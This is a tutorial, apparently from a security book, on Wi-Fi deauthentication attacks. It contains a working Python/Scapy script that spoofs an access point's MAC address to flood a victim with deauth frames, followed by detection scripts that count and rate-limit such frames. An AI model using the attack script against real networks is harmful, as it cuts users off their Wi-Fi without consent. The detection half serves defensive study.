Deauthentication attacks, or deauth attacks, fall under the category of management frame attacks, or simply session management and authentication attacks. Most of us are not aware of deauth attacks, so let's learn the basics. When a client wishes to disconnect from an access point (AP), the client sends a deauthentication frame. The AP also sends a deauthentication frame in reply. This is the normal process, but an attacker takes advantage of it. The attacker spoofs the MAC address of the victim and sends the deauth frame to the AP on behalf of the victim; because of this, the connection with the client is dropped. The aireplay-ng program is the best tool to accomplish the deauth attack. In this section, you will learn how to carry out this attack by using Python.
Now, let’s look at the following code:
from scapy.all import *
import sys
interface = "mon0"  # wireless interface in monitor mode
BSSID = raw_input("Enter the MAC of AP ")
victim_mac = raw_input("Enter the MAC of Victim ")
# addr1 = receiver, addr2 = transmitter, addr3 = BSSID
frame = RadioTap()/Dot11(addr1=victim_mac, addr2=BSSID, addr3=BSSID)/Dot11Deauth()
sendp(frame, iface=interface, count=1000, inter=.1)
This code is very easy to understand. The frame = RadioTap()/Dot11(addr1=victim_mac, addr2=BSSID, addr3=BSSID)/Dot11Deauth() statement creates the deauth packet. From the very first diagram in this chapter, you can check these addresses. In the last line, sendp(frame, iface=interface, count=1000, inter=.1), count gives the total number of packets sent, and inter indicates the interval between two consecutive packets.
The output of the deauth.py program is as follows:
root@Lokesh|Lucky:/wireless# python deauth.py
WARNING: No route found for IPv6 destination :: (no default route?)
Enter the MAC of AP 0c:d2:b5:01:0f:e6
Enter the MAC of Victim 88:53:2E:0A:75:3F
The aim of this attack is not only to perform a deauth attack but also to check the victim’s security system. An IDS should have the capability to detect the deauth attack. So far, there is no way of avoiding the attack, but it can be detected.
You can offer a solution to your client for this attack. A simple Python script can detect the deauth attack. The following is the code for the detection:
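from scapy.all import *
interface = 'mon0'
i = 1  # running count of deauth frames seen
def info(fm):
    global i
    if fm.haslayer(Dot11):
        # type 0 = management frame, subtype 12 = deauthentication
        if fm.type == 0 and fm.subtype == 12:
            print("Deauth detected %d" % i)
            i = i + 1
sniff(iface=interface, prn=info)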
The preceding code is very easy to understand. Let’s look at the new things here. The fm.subtype == 12 check identifies the deauth frame, and the globally declared i variable keeps the packet count.
In order to check the attack, I have carried out the deauth attack.
The output of the mac_d.py script is as follows:
root@Lokesh|Lucky:/wireless# python mac_d.py
WARNING: No route found for IPv6 destination :: (no default route?)
Deauth detected 1
Deauth detected 2
Deauth detected 3
Deauth detected 4
Deauth detected 5
Deauth detected 6
Deauth detected 7
Deauth detected 8
By analyzing the packet count, you can detect whether it falls under the DoS attack or normal behavior. I hope you learned something valuable from this article.
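The packet-count analysis described above can be automated with a sliding-window rate check per sender and receiver pair. This is an added example, not code from the original article; the 5-second window, the threshold of 10 frames, the class and function names and the aa:bb:cc:dd:ee:01 address are assumptions, and the event list is constructed.

```python
from collections import defaultdict, deque

AP = "0c:d2:b5:01:0f:e6"       # AP MAC from the sample run above
CLIENT = "88:53:2e:0a:75:3f"   # client MAC from the sample run above
OTHER = "aa:bb:cc:dd:ee:01"    # constructed MAC for a benign client

class DeauthRateDetector(object):
    """Flag a (sender, receiver) pair once its deauth rate crosses a threshold."""

    def __init__(self, window=5.0, threshold=10):
        # Assumed tuning: 10 or more deauth frames inside 5 seconds is a flood.
        self.window = window
        self.threshold = threshold
        self.recent = defaultdict(deque)  # pair -> timestamps still in window
        self.alerted = set()              # pairs currently above threshold

    def observe(self, ts, src, dst):
        """Record one deauth frame; return True when the pair first crosses."""
        key = (src.lower(), dst.lower())
        stamps = self.recent[key]
        stamps.append(ts)
        while ts - stamps[0] > self.window:   # drop frames older than window
            stamps.popleft()
        if len(stamps) < self.threshold:
            self.alerted.discard(key)         # rate fell back, re-arm the alert
            return False
        if key in self.alerted:
            return False                      # already reported this burst
        self.alerted.add(key)
        return True

def scan(events, **tuning):
    """Return the events at which an alert fired, in order."""
    detector = DeauthRateDetector(**tuning)
    return [e for e in events if detector.observe(*e)]

# Constructed capture: one ordinary disconnect, then 30 frames 0.1 s apart
# (the spacing the attack script above uses), as (time, addr2, addr1).
SAMPLE_EVENTS = [(10.0, OTHER, AP), (10.01, AP, OTHER)]
SAMPLE_EVENTS += [(100.0 + n / 10.0, AP, CLIENT) for n in range(30)]

if __name__ == "__main__":
    for ts, src, dst in scan(SAMPLE_EVENTS):
        print("deauth flood: %s -> %s at t=%.1f" % (src, dst, ts))
```

In the sniff callback, pass fm.time, fm.addr2 and fm.addr1 to observe() for each frame that matches the deauth check, and alert when it returns True.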